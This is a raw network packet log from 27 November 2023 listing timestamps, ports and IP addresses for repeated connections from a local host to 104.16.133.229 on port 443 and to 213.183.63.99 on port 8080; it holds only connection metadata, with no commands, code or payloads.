Nov 27, 2023 10:12:23.384033918 CET	49744	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:23.385401011 CET	49744	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:23.385587931 CET	49744	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:23.386238098 CET	443	49744	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:23.434406996 CET	49744	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:23.434431076 CET	443	49744	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:23.482371092 CET	49744	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:23.675561905 CET	443	49744	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:23.675719023 CET	443	49744	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:23.675905943 CET	49744	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:23.675936937 CET	49744	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:23.675937891 CET	49744	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:23.675954103 CET	443	49744	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:23.675967932 CET	443	49744	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:23.676044941 CET	49732	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:12:23.885622025 CET	8080	49732	213.183.63.99	192.168.2.4
Nov 27, 2023 10:12:23.933394909 CET	49732	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:12:27.074321985 CET	49732	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:12:27.277515888 CET	8080	49732	213.183.63.99	192.168.2.4
Nov 27, 2023 10:12:27.283257008 CET	49745	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:27.283299923 CET	443	49745	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:27.283351898 CET	49745	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:27.283834934 CET	49745	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:27.283848047 CET	443	49745	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:27.331516981 CET	49732	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:12:27.538441896 CET	443	49745	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:27.581500053 CET	49745	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:28.206490993 CET	49731	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:12:28.413296938 CET	8080	49731	213.183.63.99	192.168.2.4
Nov 27, 2023 10:12:28.818988085 CET	49745	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:28.819014072 CET	443	49745	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:28.819125891 CET	49745	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:28.819132090 CET	443	49745	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:28.820175886 CET	443	49745	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:28.820250988 CET	49745	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:28.825617075 CET	49745	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:28.825707912 CET	443	49745	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:28.825776100 CET	49745	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:28.825783014 CET	443	49745	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:28.874439955 CET	49745	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:28.952260017 CET	443	49745	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:28.952383995 CET	443	49745	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:28.952457905 CET	49745	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:28.952771902 CET	49745	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:28.952797890 CET	443	49745	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:28.952814102 CET	49745	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:28.952819109 CET	443	49745	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:28.953032017 CET	49732	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:12:29.162070990 CET	8080	49732	213.183.63.99	192.168.2.4
Nov 27, 2023 10:12:29.210083008 CET	49732	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:12:32.163367033 CET	49732	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:12:32.366130114 CET	8080	49732	213.183.63.99	192.168.2.4
Nov 27, 2023 10:12:32.372520924 CET	49746	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:32.372558117 CET	443	49746	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:32.372654915 CET	49746	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:32.373224974 CET	49746	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:32.373239040 CET	443	49746	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:32.420952082 CET	49732	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:12:32.630393028 CET	443	49746	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:32.630814075 CET	49746	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:32.630835056 CET	443	49746	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:32.631441116 CET	49746	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:32.631447077 CET	443	49746	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:32.632318020 CET	443	49746	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:32.632435083 CET	49746	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:32.637007952 CET	49746	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:32.637063980 CET	443	49746	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:32.637464046 CET	49746	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:32.637470961 CET	443	49746	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:32.684875011 CET	49746	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:32.923443079 CET	443	49746	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:32.923574924 CET	443	49746	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:32.923636913 CET	49746	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:32.923732042 CET	49746	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:32.923753977 CET	443	49746	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:32.923773050 CET	49746	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:32.923778057 CET	443	49746	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:32.923979998 CET	49732	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:12:33.132160902 CET	8080	49732	213.183.63.99	192.168.2.4
Nov 27, 2023 10:12:33.179832935 CET	49732	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:12:36.133266926 CET	49732	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:12:36.335901976 CET	8080	49732	213.183.63.99	192.168.2.4
Nov 27, 2023 10:12:36.339991093 CET	49747	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:36.340014935 CET	443	49747	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:36.340092897 CET	49747	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:36.340653896 CET	49747	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:36.340667963 CET	443	49747	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:36.387914896 CET	49732	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:12:36.596956968 CET	443	49747	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:36.597218990 CET	49747	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:36.597229958 CET	443	49747	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:36.597248077 CET	49747	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:36.597251892 CET	443	49747	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:36.598126888 CET	443	49747	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:36.598182917 CET	49747	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:36.599580050 CET	49747	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:36.599632025 CET	443	49747	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:36.599740982 CET	49747	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:36.599745989 CET	443	49747	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:36.647149086 CET	49747	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:36.889760017 CET	443	49747	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:36.890048027 CET	443	49747	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:36.890105963 CET	49747	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:36.890181065 CET	49747	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:36.890192032 CET	443	49747	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:36.890207052 CET	49747	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:36.890212059 CET	443	49747	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:36.890369892 CET	49732	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:12:37.100423098 CET	8080	49732	213.183.63.99	192.168.2.4
Nov 27, 2023 10:12:37.148153067 CET	49732	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:12:40.101702929 CET	49732	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:12:40.304655075 CET	8080	49732	213.183.63.99	192.168.2.4
Nov 27, 2023 10:12:40.311295986 CET	49748	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:40.311379910 CET	443	49748	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:40.311471939 CET	49748	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:40.312196016 CET	49748	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:40.312203884 CET	443	49748	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:40.359759092 CET	49732	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:12:40.567599058 CET	443	49748	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:40.567783117 CET	49748	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:40.567804098 CET	443	49748	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:40.567909002 CET	49748	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:40.567914963 CET	443	49748	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:40.570338964 CET	443	49748	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:40.570452929 CET	49748	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:40.571774006 CET	49748	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:40.571907997 CET	49748	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:40.573579073 CET	443	49748	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:40.621165991 CET	49748	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:40.621184111 CET	443	49748	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:40.668886900 CET	49748	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:40.855524063 CET	443	49748	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:40.855719090 CET	443	49748	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:40.855878115 CET	49748	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:40.855917931 CET	49748	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:40.855937004 CET	443	49748	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:40.855952024 CET	49748	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:40.855957985 CET	443	49748	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:40.856095076 CET	49732	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:12:41.066114902 CET	8080	49732	213.183.63.99	192.168.2.4
Nov 27, 2023 10:12:41.113816023 CET	49732	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:12:43.426335096 CET	49731	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:12:43.519500971 CET	8080	49731	213.183.63.99	192.168.2.4
Nov 27, 2023 10:12:43.519551039 CET	49731	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:12:43.633173943 CET	8080	49731	213.183.63.99	192.168.2.4
Nov 27, 2023 10:12:44.067797899 CET	49732	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:12:44.270402908 CET	8080	49732	213.183.63.99	192.168.2.4
Nov 27, 2023 10:12:44.274350882 CET	49749	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:44.274386883 CET	443	49749	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:44.274449110 CET	49749	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:44.274971962 CET	49749	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:44.274985075 CET	443	49749	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:44.322557926 CET	49732	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:12:44.527432919 CET	443	49749	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:44.569278002 CET	49749	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:44.569292068 CET	443	49749	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:44.569422960 CET	49749	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:44.569426060 CET	443	49749	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:44.570338011 CET	443	49749	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:44.570398092 CET	49749	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:44.571643114 CET	49749	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:44.571707010 CET	443	49749	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:44.571851015 CET	49749	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:44.571856976 CET	443	49749	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:44.634931087 CET	49749	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:44.816873074 CET	443	49749	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:44.817004919 CET	443	49749	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:44.817059040 CET	49749	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:44.822964907 CET	49749	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:44.822983027 CET	443	49749	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:44.823007107 CET	49749	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:44.823013067 CET	443	49749	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:44.823168039 CET	49732	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:12:45.029983997 CET	8080	49732	213.183.63.99	192.168.2.4
Nov 27, 2023 10:12:45.073781967 CET	49732	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:12:49.371644020 CET	49732	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:12:49.574310064 CET	8080	49732	213.183.63.99	192.168.2.4
Nov 27, 2023 10:12:49.580787897 CET	49750	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:49.580826044 CET	443	49750	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:49.580908060 CET	49750	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:49.581459045 CET	49750	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:49.581470013 CET	443	49750	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:49.628994942 CET	49732	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:12:49.837374926 CET	443	49750	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:49.837559938 CET	49750	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:49.837575912 CET	443	49750	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:49.837764025 CET	49750	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:49.837768078 CET	443	49750	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:49.838783979 CET	443	49750	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:49.838850975 CET	49750	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:49.840368986 CET	49750	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:49.840430021 CET	443	49750	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:49.840573072 CET	49750	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:49.840580940 CET	443	49750	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:49.888022900 CET	49750	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:50.132571936 CET	443	49750	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:50.132700920 CET	443	49750	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:50.132746935 CET	49750	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:50.132894039 CET	49750	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:50.132908106 CET	443	49750	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:50.133074045 CET	49732	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:12:50.341698885 CET	8080	49732	213.183.63.99	192.168.2.4
Nov 27, 2023 10:12:50.389415026 CET	49732	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:12:53.342760086 CET	49732	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:12:53.545542955 CET	8080	49732	213.183.63.99	192.168.2.4
Nov 27, 2023 10:12:53.558871031 CET	49752	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:53.558897972 CET	443	49752	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:53.559052944 CET	49752	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:53.559467077 CET	49752	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:53.559479952 CET	443	49752	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:53.591001034 CET	49732	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:12:53.812057018 CET	443	49752	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:53.812232971 CET	49752	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:53.812249899 CET	443	49752	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:53.812406063 CET	49752	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:53.812411070 CET	443	49752	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:53.813287020 CET	443	49752	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:53.813347101 CET	49752	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:53.814680099 CET	49752	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:53.814730883 CET	443	49752	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:53.814965010 CET	49752	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:53.861254930 CET	443	49752	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:53.862449884 CET	49752	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:53.862457991 CET	443	49752	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:53.910105944 CET	49752	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:54.101471901 CET	443	49752	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:54.101582050 CET	443	49752	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:54.101774931 CET	49752	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:54.101834059 CET	49752	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:54.101849079 CET	443	49752	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:54.101866961 CET	49752	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:54.101872921 CET	443	49752	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:54.102040052 CET	49732	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:12:54.309473991 CET	8080	49732	213.183.63.99	192.168.2.4
Nov 27, 2023 10:12:54.362864017 CET	49732	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:12:57.316050053 CET	49732	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:12:57.519480944 CET	8080	49732	213.183.63.99	192.168.2.4
Nov 27, 2023 10:12:57.527468920 CET	49753	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:57.527529001 CET	443	49753	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:57.527620077 CET	49753	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:57.528543949 CET	49753	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:57.528551102 CET	443	49753	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:57.560164928 CET	49732	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:12:57.795984983 CET	443	49753	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:57.796370029 CET	49753	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:57.796395063 CET	443	49753	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:57.796546936 CET	49753	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:57.796551943 CET	443	49753	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:57.802500010 CET	443	49753	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:57.802613020 CET	49753	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:57.804430962 CET	49753	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:57.804552078 CET	49753	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:57.807704926 CET	443	49753	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:57.855397940 CET	49753	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:57.855423927 CET	443	49753	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:57.903189898 CET	49753	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:58.085908890 CET	443	49753	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:58.086061001 CET	443	49753	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:58.086137056 CET	49753	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:58.087779045 CET	49753	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:58.087795973 CET	443	49753	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:58.087821960 CET	49753	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:58.087827921 CET	443	49753	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:58.087982893 CET	49732	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:12:58.297277927 CET	8080	49732	213.183.63.99	192.168.2.4
Nov 27, 2023 10:12:58.344964981 CET	49732	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:12:58.641925097 CET	49731	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:12:58.727483988 CET	8080	49731	213.183.63.99	192.168.2.4
Nov 27, 2023 10:12:58.727556944 CET	49731	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:12:58.848999977 CET	8080	49731	213.183.63.99	192.168.2.4
Nov 27, 2023 10:13:01.298338890 CET	49732	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:13:01.503215075 CET	8080	49732	213.183.63.99	192.168.2.4
Nov 27, 2023 10:13:01.506906986 CET	49754	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:01.507009983 CET	443	49754	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:01.507105112 CET	49754	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:01.507796049 CET	49754	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:01.507808924 CET	443	49754	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:01.555383921 CET	49732	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:13:01.764431953 CET	443	49754	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:01.765137911 CET	49754	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:01.765162945 CET	443	49754	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:01.765305996 CET	49754	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:01.765311956 CET	443	49754	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:01.766195059 CET	443	49754	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:01.766278982 CET	49754	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:01.771716118 CET	49754	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:01.771784067 CET	443	49754	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:01.772882938 CET	49754	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:01.772891045 CET	443	49754	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:01.820382118 CET	49754	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:02.056962013 CET	443	49754	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:02.057102919 CET	443	49754	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:02.057157040 CET	49754	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:02.262466908 CET	49754	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:02.262495041 CET	443	49754	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:02.262506008 CET	49754	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:02.262512922 CET	443	49754	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:02.262689114 CET	49732	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:13:02.473054886 CET	8080	49732	213.183.63.99	192.168.2.4
Nov 27, 2023 10:13:02.520714998 CET	49732	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:13:05.474217892 CET	49732	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:13:05.676893950 CET	8080	49732	213.183.63.99	192.168.2.4
Nov 27, 2023 10:13:05.683373928 CET	49755	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:05.683414936 CET	443	49755	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:05.683526039 CET	49755	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:05.684258938 CET	49755	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:05.684273005 CET	443	49755	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:05.716187954 CET	49732	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:13:05.936490059 CET	443	49755	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:05.956413031 CET	49755	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:05.956435919 CET	443	49755	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:05.956593990 CET	49755	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:05.956602097 CET	443	49755	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:05.957727909 CET	443	49755	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:05.957845926 CET	49755	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:05.960059881 CET	49755	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:05.960129976 CET	443	49755	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:05.960218906 CET	49755	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:05.960230112 CET	443	49755	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:06.008855104 CET	49755	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:06.225358009 CET	443	49755	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:06.225507021 CET	443	49755	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:06.225737095 CET	49755	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:06.226322889 CET	49755	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:06.226346970 CET	443	49755	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:06.226624012 CET	49732	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:13:06.434288025 CET	8080	49732	213.183.63.99	192.168.2.4
Nov 27, 2023 10:13:06.484275103 CET	49732	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:13:09.437474012 CET	49732	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:13:09.640115023 CET	8080	49732	213.183.63.99	192.168.2.4
Nov 27, 2023 10:13:09.645713091 CET	49756	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:09.645739079 CET	443	49756	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:09.645832062 CET	49756	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:09.646347046 CET	49756	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:09.646352053 CET	443	49756	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:09.693908930 CET	49732	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:13:09.899811983 CET	443	49756	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:09.899945974 CET	49756	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:09.899957895 CET	443	49756	104.16.133.229	192.168.2.4
